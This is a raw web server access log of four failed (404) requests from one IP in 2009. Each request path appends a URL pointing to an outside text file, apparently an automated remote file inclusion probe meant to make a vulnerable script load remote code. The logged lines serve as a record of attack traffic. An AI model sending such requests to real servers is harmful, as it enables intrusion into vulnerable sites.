129.215.82.1 - - [27/Sep/2009:19:19:01 -0700] "GET /logs/%3CH1%3ENot%20Found%3C/H1%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:02 -0700] "GET /%3CH1%3ENot%20Found%3C/H1%3Ehttp://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:02 -0700] "GET /logs/access_090629.log/The%20requested%20document%20was%20not%20found%20on%20this%20server.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
129.215.82.1 - - [27/Sep/2009:19:19:02 -0700] "GET /logs/The%20requested%20document%20was%20not%20found%20on%20this%20server.http://unixstats.org/tools/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
